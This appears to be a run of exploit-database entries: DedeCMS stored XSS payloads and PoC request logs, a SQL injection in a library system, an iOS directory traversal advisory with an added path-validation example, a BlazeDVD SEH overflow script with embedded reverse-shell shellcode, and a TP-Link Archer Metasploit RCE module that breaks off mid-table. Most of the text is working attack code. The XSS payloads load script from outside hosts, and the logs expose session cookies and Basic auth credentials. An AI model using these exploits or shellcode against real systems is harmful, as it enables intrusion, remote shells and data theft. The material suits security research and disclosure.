<iframe src="https://test23.localhost:8080/dede/file_pic_view.php?activepath=%2Fuploads%3E%22%3Cimg%20src=%22[Evil.Source]%22%3E%3Cimg%20src=%22[Evil.Source]%22%3E">
<iframe src="https://test23.localhost:8080/dede/file_manage_view.php?fmdo=move&filename=%3E%22%3E%3Ciframe%20src=%22x%22%20onload=alert(document.domain)%3E%3Cimg%3E&activepath=%2Fuploads">
<iframe src="https://test23.localhost:8080/dede/file_manage_view.php?fmdo=move&filename=test&activepath=%3E%22%3E%3Ciframe%20src=%22x%22%20onload=alert(document.domain)%3E%3Cimg%3E">
<iframe src="https://test23.localhost:8080/dede/tags_main.php?tag=pwnd&orderway=%22%3E%3Ciframe%20src=%22https://vuln-lab.com/evil.js%22%3E">
<iframe src="https://test23.localhost:8080/dede/tags_main.php?tag=%22%3E%3Ciframe%20src=%22https://vuln-lab.com/evil.js%22%3E&orderby=1&orderway=">
<iframe src="https://test23.localhost:8080/include/dialog/select_media.php?CKEditor=>"><iframe src=evil.source onload=alert(document.domain)>body&CKEditorFuncNum=2&langCode=en">
<iframe src="https://test23.localhost:8080/include/dialog/select_media.php?CKEditor=body&CKEditorFuncNum=>"><iframe src=evil.source onload=alert(document.domain)>2&langCode=en">
...

--- PoC Session Logs [POST] --- (Some Examples ...)
https://test23.localhost:8080/dede/media_main.php
Host: test23.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 152
Origin: https://test23.localhost:8080
Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE=
Connection: keep-alive
Referer: https://test23.localhost:8080/dede/media_main.php
Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=2et4s8ep51lasddnshjcco5ji3; DedeUserID=1; DedeUserID__ckMd5=936f42b01c3c7958; DedeLoginTime=1586191031; DedeLoginTime__ckMd5=37af65fa4635a14f; ENV_GOBACK_URL=%2Fdede%2Fmedia_main.php
keyword=>"%20<<img src=https://[Evil.Domain]/[Evil.Source].png>&mediatype=0&membertype=0&imageField.x=23&imageField.y=4
-
POST: HTTP/2.0 200 OK
server: nginx
content-type: text/html; charset=utf-8
content-length: 1830
expires: Thu, 19 Nov 1981 08:52:00 GMT
pragma: no-cache
cache-control: private
set-cookie: ENV_GOBACK_URL=%2Fdede%2Fmedia_main.php; expires=Mon, 06-Apr-2020 17:53:23 GMT; Max-Age=3600; path=/
vary: Accept-Encoding
content-encoding: gzip
x-powered-by: PHP/5.6.40, PleskLin
X-Firefox-Spdy: h2
---
https://test23.localhost:8080/dede/file_pic_view.php?activepath=%2Fuploads%2F>" <"<img+src%3Dhttps%3A%2F%2Fwww.vulnerability-lab.com%2Fgfx%2Flogo-header.png>&imageField.x=0&imageField.y=0
Host: test23.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE=
Connection: keep-alive
Referer: https://test23.localhost:8080/dede/file_pic_view.php?activepath=&imageField.x=0&imageField.y=0
Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=2et4s8ep51lasddnshjcco5ji3; DedeUserID=1; DedeUserID__ckMd5=936f42b01c3c7958; DedeLoginTime=1586191031; DedeLoginTime__ckMd5=37af65fa4635a14f; ENV_GOBACK_URL=%2Fdede%2Fmedia_main.php%3Fdopost%3Dfilemanager
Upgrade-Insecure-Requests: 1
-
GET: HTTP/2.0 200 OK
server: nginx
content-type: text/html; charset=utf-8
x-powered-by: PHP/5.6.40
expires: Thu, 19 Nov 1981 08:52:00 GMT
pragma: no-cache
cache-control: private
X-Firefox-Spdy: h2
---
https://test23.localhost:8080/include/dialog/select_media.php?CKEditor=>"><iframe src=evil.source onload=alert("1")>body&CKEditorFuncNum=>"><iframe src=evil.source onload=alert("2")>2&langCode=en
Host: test23.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Authorization: Basic dGVzdGVyMjM6Y2hhb3M2NjYhISE=
Connection: keep-alive
Cookie: PHPSESSID=2et4s8ep51lasddnshjcco5ji3; DedeUserID=1; DedeUserID__ckMd5=936f42b01c3c7958; DedeLoginTime=1586191031; DedeLoginTime__ckMd5=37af65fa4635a14f; ENV_GOBACK_URL=%2Fdede%2Ffeedback_main.php
Upgrade-Insecure-Requests: 1
-
GET: HTTP/2.0 200 OK
server: nginx
content-type: text/html; charset=utf-8
content-length: 1137
expires: Thu, 19 Nov 1981 08:52:00 GMT
cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
pragma: no-cache
vary: Accept-Encoding
content-encoding: gzip
x-powered-by: PHP/5.6.40, PleskLin
X-Firefox-Spdy: h2

Reference(s):
https://test23.localhost:8080/dede/media_main.php
https://test23.localhost:8080/dede/tags_main.php
https://test23.localhost:8080/dede/file_pic_view.php
https://test23.localhost:8080/dede/file_manage_view.php
https://test23.localhost:8080/include/dialog/select_media.php

Solution - Fix & Patch:
=======================
1. Parse the content to disallow HTML / JS and special chars in the affected input fields.
2. Restrict the vulnerable parameters to prevent injects via POST method requests.
3. Secure the output location where the content is insecurely sanitized and delivered as output.

Security Risk:
==============
The security risk of the application-side persistent cross site scripting web vulnerabilities in the different modules is estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
-
Xeroneit Library Management System 3.0 - 'category' SQL Injection
# Exploit Title: Xeroneit Library Management System 3.0 - 'category' SQL Injection
# Google Dork: "LMS v3.0 - Xerone IT "
# Date: 2020-04-09
# Exploit Author: Sohel Yousef jellyfish security team
# Software Link: https://xeroneit.net/portfolio/library-management-system-lms
# Software Demo: https://xeroneit.co/demo/lms/home/login
# Version: v3.0
# Category: webapps

1. Description

The script has SQL injection in the books category at this path:
/lms/home/book?category_name=00*SQLI

Error Number: 1064
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0' GROUP BY `title`, `author`, `edition` ORDER BY `title` ASC LIMIT 21' at line 3

SELECT sum(cast(cast(book_info.status as char) as SIGNED)) as available_book, `book_info`.`number_of_books`, `book_info`.`id`, `book_info`.`category_id`, `book_info`.`title`, `book_info`.`size1` as `size`, `book_info`.`publishing_year`, `book_info`.`publisher`, `book_info`.`edition_year`, `book_info`.`subtitle`, `book_info`.`edition`, `book_info`.`isbn`, `book_info`.`author`, `book_info`.`cover`, `book_info`.`add_date` FROM `book_info` WHERE FIND_IN_SET('57'', category_id) !=0 AND `book_info`.`deleted` = '0' GROUP BY `title`, `author`, `edition` ORDER BY `title` ASC LIMIT 21

Filename: models/Basic.php
Line Number: 284
-
File Transfer iFamily 2.1 - Directory Traversal
# Title: File Transfer iFamily 2.1 - Directory Traversal
# Author: Vulnerability Laboratory
# Date: 2020-04-15
# Software Link: http://www.dedecms.com/products/dedecms/downloads/
# CVE: N/A

Document Title:
===============
File Transfer iFamily v2.1 - Directory Traversal Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2199

Release Date:
=============
2020-04-14

Vulnerability Laboratory ID (VL-ID):
====================================
2199

Common Vulnerability Scoring System:
====================================
7.1

Vulnerability Class:
====================
Directory- or Path-Traversal

Current Estimated Price:
========================
1.000€ - 2.000€

Product & Service Introduction:
===============================
Send photos, videos and documents to other devices without Internet. A complete application to exchange files wirelessly between devices. It uses the Multipeer Connectivity Framework to search and connect to available devices, without the need of internet connection or any kind of server and database.

(Copy of the Homepage: https://apps.apple.com/us/app/file-transfer-ifamily-files-photo-video-documents-wifi/id957971575 )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a directory traversal web vulnerability in the official File Transfer iFamily v2.1 iOS mobile application.
Affected Product(s):
====================
DONG JOO CHO
Product: File Transfer iFamily v2.1 - iOS Mobile Web Application

Vulnerability Disclosure Timeline:
==================================
2020-04-14: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Authentication Type:
====================
Pre auth - no privileges

User Interaction:
=================
No User Interaction

Disclosure Type:
================
Independent Security Research

Technical Details & Description:
================================
A directory traversal web vulnerability has been discovered in the official File Transfer iFamily v2.1 iOS mobile application. The vulnerability allows remote attackers to change the application path in performed requests to compromise the local application or file-system of a mobile device. Attackers are for example able to request environment variables or a sensitive system path.

The directory-traversal web vulnerability is located in the main application path request performed via GET method. Attackers are able to request for example the local ./etc/ path of the web-server by changing the local path in the performed request itself. In a first request the attacker changes the path, and the host redirects to complete the address with "..". Then the attacker just attaches a final slash to the request and the path can be accessed via web-browser to download local files. Exploitation of the directory traversal web vulnerability requires no privileged web-application user account or user interaction. Successful exploitation of the vulnerability results in information leaking by unauthorized file access and mobile application compromise.

Proof of Concept (PoC):
=======================
The directory traversal vulnerability can be exploited by attackers with access to the wifi interface in a local network without user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

PoC: Exploitation
http://localhost/../../../../../../../../../../../../../../../../../../../../../../
http://localhost//../

--- PoC Session Logs [GET] ---
http://localhost/../../../../../../../../../../../../../../../../../../../../../../
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 2521
-
http://localhost../etc/
Host: localhost..
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
-
add slash to correct host address (/.././)
http://localhost/./
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
-
Access granted
http://localhost/../../../../../../../../../../../../../../../../../../../../../../
GET: HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 2521

Solution - Fix & Patch:
=======================
The vulnerability can be patched by a restriction of the visible and accessible ./etc/ path in the app container. Disallow path changes in the client-side GET method requests and validate them securely.
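The validation the fix calls for, as an added example that is not code from the iFamily app or from the advisory: a strict request-path resolver for a LAN file-sharing endpoint, exercised with the PoC request targets above as constructed inputs. DOC_ROOT, the function names and the benign sample paths are assumptions.

```python
"""Strict request-path validation for a LAN file-sharing endpoint.

Added example, not code from the iFamily app or the advisory. Assumptions:
the app serves files from DOC_ROOT (hypothetical) and hands each GET
request-target to resolve_request_path() before touching the filesystem.
"""
import posixpath
from typing import List, Optional
from urllib.parse import unquote

DOC_ROOT = "/var/app/shared"  # hypothetical share folder inside the app container


def resolve_request_path(raw_target: str, doc_root: str = DOC_ROOT) -> Optional[str]:
    """Map an HTTP request-target onto a file below doc_root.

    Returns the canonical filesystem path, or None when the request must be
    refused. The check is deliberately strict: any '..' segment is refused
    outright instead of being normalised away, so a traversal attempt is
    surfaced (and can be logged) rather than silently clamped to the root.
    """
    root = posixpath.normpath(doc_root)
    # Strip query string and fragment by hand; urlsplit() would misread a
    # request-target such as '//../' as '//netloc/path'.
    path = raw_target.split("?", 1)[0].split("#", 1)[0]
    decoded = unquote(path)  # exactly one percent-decode, like the server
    if "%" in decoded:       # still encoded after one pass: double encoding
        return None
    if "\x00" in decoded:    # NUL would truncate the path in C string APIs
        return None
    # Empty and '.' segments are harmless ('/./' is the PoC's "corrected" form);
    # any '..' segment is a traversal attempt, wherever it sits.
    segments = [s for s in decoded.split("/") if s not in ("", ".")]
    if ".." in segments:
        return None
    resolved = posixpath.normpath(root + "/" + "/".join(segments))
    # Defence in depth: the result must still lie inside the root.
    if resolved != root and not resolved.startswith(root + "/"):
        return None
    return resolved


def traversal_attempts(targets: List[str], doc_root: str = DOC_ROOT) -> List[str]:
    """Return the request-targets the resolver refuses; useful when replaying
    an access log to see which requests were traversal attempts."""
    return [t for t in targets if resolve_request_path(t, doc_root) is None]


if __name__ == "__main__":
    # Constructed sample: the advisory's PoC targets plus a few benign ones.
    sample = [
        "/../../../../../../../../../../../../../../../../../../../../../../",
        "//../",
        "/./",
        "/../etc/",
        "/%2e%2e/etc/passwd",
        "/%252e%252e/etc/passwd",
        "/photos/IMG_0001.jpg",
        "/docs/report%202020.pdf?download=1",
    ]
    for t in sample:
        print(f"{t!r:75} -> {resolve_request_path(t)}")
```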
Security Risk:
==============
The security risk of the directory traversal web vulnerability in the iOS mobile application is estimated as high.

Credits & Authors:
==================
Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
-
BlazeDVD 7.0.2 - Buffer Overflow (SEH)
# Exploit Title: BlazeDVD 7.0.2 - Buffer Overflow (SEH)
# Date: 2020-04-15
# Exploit Author: areyou1or0 <Busra Demir>
# Software Link: http://www.blazevideo.com/dvd-player/free-dvd-player.html
# Version: 7.0.2
# Tested on: Windows 7 Pro x86

#!/usr/bin/python
file = "exploit.plf"
offset = "A"*(612-4)            # padding up to the next-SEH record
nseh = "\xeb\x1e\x90\x90"        # short jmp over the SEH record into the NOP sled
seh = "\x34\x31\x02\x64"         # SEH handler overwrite (0x64023134, little-endian)
nops = "\x90" * 24

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.8.121 LPORT=8888 -f python -e x86/alpha_mixed -b '\x00\x0a\x0d\xff'
shellcode = ""
shellcode += "\x89\xe2\xda\xcc\xd9\x72\xf4\x5a\x4a\x4a\x4a\x4a\x4a"
shellcode += "\x4a\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37"
shellcode += "\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
shellcode += "\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
shellcode += "\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x69\x78\x4e\x62"
shellcode += "\x53\x30\x63\x30\x45\x50\x45\x30\x6f\x79\x7a\x45\x46"
shellcode += "\x51\x79\x50\x73\x54\x4c\x4b\x76\x30\x66\x50\x6e\x6b"
shellcode += "\x66\x32\x74\x4c\x6c\x4b\x51\x42\x72\x34\x4c\x4b\x34"
shellcode += "\x32\x31\x38\x76\x6f\x6c\x77\x61\x5a\x47\x56\x66\x51"
shellcode += "\x6b\x4f\x6e\x4c\x75\x6c\x65\x31\x33\x4c\x64\x42\x64"
shellcode += "\x6c\x31\x30\x5a\x61\x38\x4f\x64\x4d\x66\x61\x7a\x67"
shellcode += "\x49\x72\x6a\x52\x71\x42\x30\x57\x6c\x4b\x53\x62\x36"
shellcode += "\x70\x6e\x6b\x30\x4a\x45\x6c\x6c\x4b\x32\x6c\x37\x61"
shellcode += "\x43\x48\x6a\x43\x31\x58\x55\x51\x6b\x61\x32\x71\x4c"
shellcode += "\x4b\x33\x69\x47\x50\x75\x51\x6a\x73\x4c\x4b\x47\x39"
shellcode += "\x72\x38\x4d\x33\x56\x5a\x30\x49\x4e\x6b\x57\x44\x6c"
shellcode += "\x4b\x43\x31\x7a\x76\x55\x61\x79\x6f\x4e\x4c\x6a\x61"
shellcode += "\x78\x4f\x54\x4d\x33\x31\x58\x47\x54\x78\x59\x70\x44"
shellcode += "\x35\x6b\x46\x75\x53\x63\x4d\x48\x78\x75\x6b\x51\x6d"
shellcode += "\x46\x44\x74\x35\x6b\x54\x72\x78\x4c\x4b\x70\x58\x45"
shellcode += "\x74\x43\x31\x79\x43\x50\x66\x4c\x4b\x74\x4c\x32\x6b"
shellcode += "\x6e\x6b\x52\x78\x47\x6c\x46\x61\x69\x43\x6c\x4b\x47"
shellcode += "\x74\x6c\x4b\x37\x71\x4a\x70\x6d\x59\x30\x44\x46\x44"
shellcode += "\x44\x64\x33\x6b\x71\x4b\x65\x31\x43\x69\x71\x4a\x52"
shellcode += "\x71\x79\x6f\x69\x70\x51\x4f\x51\x4f\x51\x4a\x4c\x4b"
shellcode += "\x57\x62\x58\x6b\x4e\x6d\x63\x6d\x35\x38\x55\x63\x64"
shellcode += "\x72\x43\x30\x65\x50\x75\x38\x64\x37\x43\x43\x44\x72"
shellcode += "\x43\x6f\x42\x74\x52\x48\x50\x4c\x71\x67\x67\x56\x44"
shellcode += "\x47\x59\x6f\x69\x45\x68\x38\x7a\x30\x37\x71\x63\x30"
shellcode += "\x63\x30\x46\x49\x6f\x34\x71\x44\x42\x70\x32\x48\x56"
shellcode += "\x49\x6d\x50\x42\x4b\x57\x70\x69\x6f\x49\x45\x56\x30"
shellcode += "\x50\x50\x36\x30\x30\x50\x33\x70\x66\x30\x67\x30\x76"
shellcode += "\x30\x32\x48\x4a\x4a\x54\x4f\x39\x4f\x4d\x30\x39\x6f"
shellcode += "\x49\x45\x6e\x77\x42\x4a\x63\x35\x30\x68\x69\x50\x6e"
shellcode += "\x48\x46\x68\x61\x69\x62\x48\x34\x42\x63\x30\x65\x72"
shellcode += "\x6f\x48\x4f\x79\x4a\x46\x62\x4a\x46\x70\x52\x76\x52"
shellcode += "\x77\x65\x38\x4d\x49\x4d\x75\x71\x64\x70\x61\x4b\x4f"
shellcode += "\x58\x55\x4c\x45\x4f\x30\x34\x34\x54\x4c\x6b\x4f\x70"
shellcode += "\x4e\x34\x48\x63\x45\x5a\x4c\x42\x48\x6a\x50\x68\x35"
shellcode += "\x4c\x62\x32\x76\x39\x6f\x5a\x75\x63\x58\x61\x73\x32"
shellcode += "\x4d\x63\x54\x57\x70\x4f\x79\x38\x63\x52\x77\x73\x67"
shellcode += "\x62\x77\x30\x31\x7a\x56\x63\x5a\x67\x62\x71\x49\x33"
shellcode += "\x66\x79\x72\x59\x6d\x35\x36\x58\x47\x30\x44\x67\x54"
shellcode += "\x37\x4c\x75\x51\x46\x61\x6c\x4d\x37\x34\x64\x64\x66"
shellcode += "\x70\x7a\x66\x75\x50\x52\x64\x32\x74\x76\x30\x56\x36"
shellcode += "\x63\x66\x46\x36\x73\x76\x71\x46\x70\x4e\x30\x56\x76"
shellcode += "\x36\x51\x43\x51\x46\x50\x68\x71\x69\x48\x4c\x57\x4f"
shellcode += "\x6e\x66\x69\x6f\x6a\x75\x4b\x39\x79\x70\x42\x6e\x33"
shellcode += "\x66\x47\x36\x79\x6f\x36\x50\x53\x58\x76\x68\x4c\x47"
shellcode += "\x57\x6d\x31\x70\x59\x6f\x6a\x75\x4f\x4b\x6c\x30\x58"
shellcode += "\x35\x79\x32\x72\x76\x53\x58\x4f\x56\x6d\x45\x6f\x4d"
shellcode += "\x6d\x4d\x79\x6f\x4a\x75\x55\x6c\x34\x46\x31\x6c\x56"
shellcode += "\x6a\x4b\x30\x59\x6b\x6d\x30\x31\x65\x66\x65\x6d\x6b"
shellcode += "\x33\x77\x35\x43\x53\x42\x72\x4f\x50\x6a\x37\x70\x61"
shellcode += "\x43\x49\x6f\x68\x55\x41\x41"

# layout: padding | nSEH (jmp) | SEH handler | NOP sled | payload
buffer = offset + nseh + seh + nops + shellcode

f = open(file,'w')
f.write(buffer)
f.close()
-
TP-Link Archer A7/C7 - Unauthenticated LAN Remote Code Execution (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'openssl'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::Udp
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'TP-Link Archer A7/C7 Unauthenticated LAN Remote Code Execution',
        'Description' => %q{
          This module exploits a command injection vulnerability in the tdpServer daemon (/usr/bin/tdpServer),
          running on the router TP-Link Archer A7/C7 (AC1750), hardware version 5, MIPS Architecture,
          firmware version 190726.

          The vulnerability can only be exploited by an attacker on the LAN side of the router, but the attacker
          does not need any authentication to abuse it. After exploitation, an attacker will be able to execute
          any command as root, including downloading and executing a binary from another host.

          This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the Flashback team
          (Pedro Ribeiro + Radek Domanski).
        },
        'License' => MSF_LICENSE,
        'Author' =>
          [
            'Pedro Ribeiro <pedrib[at]gmail.com>',                      # Vulnerability discovery and Metasploit module
            'Radek Domanski <radek.domanski[at]gmail.com> @RabbitPro'   # Vulnerability discovery and Metasploit module
          ],
        'References' =>
          [
            [ 'URL', 'https://www.thezdi.com/blog/2020/4/6/exploiting-the-tp-link-archer-c7-at-pwn2own-tokyo'],
            [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Tokyo_2019/lao_bomb/lao_bomb.md'],
            [ 'URL', 'https://github.com/rdomanski/Exploits_and_Advisories/blob/master/advisories/Pwn2Own/Tokyo2019/lao_bomb.md'],
            [ 'CVE', '2020-10882'],
            [ 'CVE', '2020-10883'],
            [ 'CVE', '2020-10884'],
            [ 'ZDI', '20-334'],
            [ 'ZDI', '20-335'],
            [ 'ZDI', '20-336' ]
          ],
        'Privileged' => true,
        'Platform' => 'linux',
        'Arch' => ARCH_MIPSBE,
        'Payload' => {},
        'Stance' => Msf::Exploit::Stance::Aggressive,
        'DefaultOptions' =>
          {
            'PAYLOAD' => 'linux/mipsbe/shell_reverse_tcp',
            'WfsDelay' => 15,
          },
        'Targets' =>
          [
            [ 'TP-Link Archer A7/C7 (AC1750) v5 (firmware 190726)', {} ]
          ],
        'DisclosureDate' => "Mar 25 2020",
        'DefaultTarget' => 0,
      )
    )

    register_options(
      [
        Opt::RPORT(20002)
      ])

    register_advanced_options(
      [
        OptInt.new('MAX_WAIT', [true, 'Number of seconds to wait for payload download', 15])
      ])
  end

  def check
    begin
      res = send_request_cgi({
        'uri' => '/webpages/app.1564127413977.manifest',
        'method' => 'GET',
        'rport' => 80
      })

      if res && res.code == 200
        return Exploit::CheckCode::Vulnerable
      end
    rescue ::Rex::ConnectionError
      # connection refused or timed out: fall through and report Unknown
      # (the original used a bare `pass`, which is not Ruby and would raise NameError here)
    end

    return Exploit::CheckCode::Unknown
  end

  def calc_checksum(packet)
    # reference table used to calculate the packet checksum
    # used by tdpd_pkt_calc_checksum (0x4037f0)
    # located at offset 0x0416e90 in the binary
    reference_tbl = [0x00, 0x00, 0x00, 0x00, 0x77, 0x07, 0x30, 0x96, 0xee, 0x0e, 0x61, 0x2c, 0x99, 0x09, 0x51, 0xba, 0x07, 0x6d, 0xc4, 0x19, 0x70, 0x6a, 0xf4, 0x8f, 0xe9, 0x63, 0xa5, 0x35, 0x9e, 0x64, 0x95, 0xa3, 0x0e, 0xdb, 0x88, 0x32, 0x79, 0xdc, 0xb8, 0xa4, 0xe0, 0xd5, 0xe9, 0x1e, 0x97, 0xd2, 0xd9, 0x88, 0x09, 0xb6,
0x4c, 0x2b, 0x7e, 0xb1, 0x7c, 0xbd, 0xe7, 0xb8, 0x2d, 0x07, 0x90, 0xbf, 0x1d, 0x91, 0x1d, 0xb7, 0x10, 0x64, 0x6a, 0xb0, 0x20, 0xf2, 0xf3, 0xb9, 0x71, 0x48, 0x84, 0xbe, 0x41, 0xde, 0x1a, 0xda, 0xd4, 0x7d, 0x6d, 0xdd, 0xe4, 0xeb, 0xf4, 0xd4, 0xb5, 0x51, 0x83, 0xd3, 0x85, 0xc7, 0x13, 0x6c, 0x98, 0x56, 0x64, 0x6b, 0xa8, 0xc0, 0xfd, 0x62, 0xf9, 0x7a, 0x8a, 0x65, 0xc9, 0xec, 0x14, 0x01, 0x5c, 0x4f, 0x63, 0x06, 0x6c, 0xd9, 0xfa, 0x0f, 0x3d, 0x63, 0x8d, 0x08, 0x0d, 0xf5, 0x3b, 0x6e, 0x20, 0xc8, 0x4c, 0x69, 0x10, 0x5e, 0xd5, 0x60, 0x41, 0xe4, 0xa2, 0x67, 0x71, 0x72, 0x3c, 0x03, 0xe4, 0xd1, 0x4b, 0x04, 0xd4, 0x47, 0xd2, 0x0d, 0x85, 0xfd, 0xa5, 0x0a, 0xb5, 0x6b, 0x35, 0xb5, 0xa8, 0xfa, 0x42, 0xb2, 0x98, 0x6c, 0xdb, 0xbb, 0xc9, 0xd6, 0xac, 0xbc, 0xf9, 0x40, 0x32, 0xd8, 0x6c, 0xe3, 0x45, 0xdf, 0x5c, 0x75, 0xdc, 0xd6, 0x0d, 0xcf, 0xab, 0xd1, 0x3d, 0x59, 0x26, 0xd9, 0x30, 0xac, 0x51, 0xde, 0x00, 0x3a, 0xc8, 0xd7, 0x51, 0x80, 0xbf, 0xd0, 0x61, 0x16, 0x21, 0xb4, 0xf4, 0xb5, 0x56, 0xb3, 0xc4, 0x23, 0xcf, 0xba, 0x95, 0x99, 0xb8, 0xbd, 0xa5, 0x0f, 0x28, 0x02, 0xb8, 0x9e, 0x5f, 0x05, 0x88, 0x08, 0xc6, 0x0c, 0xd9, 0xb2, 0xb1, 0x0b, 0xe9, 0x24, 0x2f, 0x6f, 0x7c, 0x87, 0x58, 0x68, 0x4c, 0x11, 0xc1, 0x61, 0x1d, 0xab, 0xb6, 0x66, 0x2d, 0x3d, 0x76, 0xdc, 0x41, 0x90, 0x01, 0xdb, 0x71, 0x06, 0x98, 0xd2, 0x20, 0xbc, 0xef, 0xd5, 0x10, 0x2a, 0x71, 0xb1, 0x85, 0x89, 0x06, 0xb6, 0xb5, 0x1f, 0x9f, 0xbf, 0xe4, 0xa5, 0xe8, 0xb8, 0xd4, 0x33, 0x78, 0x07, 0xc9, 0xa2, 0x0f, 0x00, 0xf9, 0x34, 0x96, 0x09, 0xa8, 0x8e, 0xe1, 0x0e, 0x98, 0x18, 0x7f, 0x6a, 0x0d, 0xbb, 0x08, 0x6d, 0x3d, 0x2d, 0x91, 0x64, 0x6c, 0x97, 0xe6, 0x63, 0x5c, 0x01, 0x6b, 0x6b, 0x51, 0xf4, 0x1c, 0x6c, 0x61, 0x62, 0x85, 0x65, 0x30, 0xd8, 0xf2, 0x62, 0x00, 0x4e, 0x6c, 0x06, 0x95, 0xed, 0x1b, 0x01, 0xa5, 0x7b, 0x82, 0x08, 0xf4, 0xc1, 0xf5, 0x0f, 0xc4, 0x57, 0x65, 0xb0, 0xd9, 0xc6, 0x12, 0xb7, 0xe9, 0x50, 0x8b, 0xbe, 0xb8, 0xea, 0xfc, 0xb9, 0x88, 0x7c, 0x62, 0xdd, 0x1d, 0xdf, 0x15, 0xda, 0x2d, 0x49, 0x8c, 0xd3, 0x7c, 0xf3, 0xfb, 0xd4, 0x4c, 
0x65, 0x4d, 0xb2, 0x61, 0x58, 0x3a, 0xb5, 0x51, 0xce, 0xa3, 0xbc, 0x00, 0x74, 0xd4, 0xbb, 0x30, 0xe2, 0x4a, 0xdf, 0xa5, 0x41, 0x3d, 0xd8, 0x95, 0xd7, 0xa4, 0xd1, 0xc4, 0x6d, 0xd3, 0xd6, 0xf4, 0xfb, 0x43, 0x69, 0xe9, 0x6a, 0x34, 0x6e, 0xd9, 0xfc, 0xad, 0x67, 0x88, 0x46, 0xda, 0x60, 0xb8, 0xd0, 0x44, 0x04, 0x2d, 0x73, 0x33, 0x03, 0x1d, 0xe5, 0xaa, 0x0a, 0x4c, 0x5f, 0xdd, 0x0d, 0x7c, 0xc9, 0x50, 0x05, 0x71, 0x3c, 0x27, 0x02, 0x41, 0xaa, 0xbe, 0x0b, 0x10, 0x10, 0xc9, 0x0c, 0x20, 0x86, 0x57, 0x68, 0xb5, 0x25, 0x20, 0x6f, 0x85, 0xb3, 0xb9, 0x66, 0xd4, 0x09, 0xce, 0x61, 0xe4, 0x9f, 0x5e, 0xde, 0xf9, 0x0e, 0x29, 0xd9, 0xc9, 0x98, 0xb0, 0xd0, 0x98, 0x22, 0xc7, 0xd7, 0xa8, 0xb4, 0x59, 0xb3, 0x3d, 0x17, 0x2e, 0xb4, 0x0d, 0x81, 0xb7, 0xbd, 0x5c, 0x3b, 0xc0, 0xba, 0x6c, 0xad, 0xed, 0xb8, 0x83, 0x20, 0x9a, 0xbf, 0xb3, 0xb6, 0x03, 0xb6, 0xe2, 0x0c, 0x74, 0xb1, 0xd2, 0x9a, 0xea, 0xd5, 0x47, 0x39, 0x9d, 0xd2, 0x77, 0xaf, 0x04, 0xdb, 0x26, 0x15, 0x73, 0xdc, 0x16, 0x83, 0xe3, 0x63, 0x0b, 0x12, 0x94, 0x64, 0x3b, 0x84, 0x0d, 0x6d, 0x6a, 0x3e, 0x7a, 0x6a, 0x5a, 0xa8, 0xe4, 0x0e, 0xcf, 0x0b, 0x93, 0x09, 0xff, 0x9d, 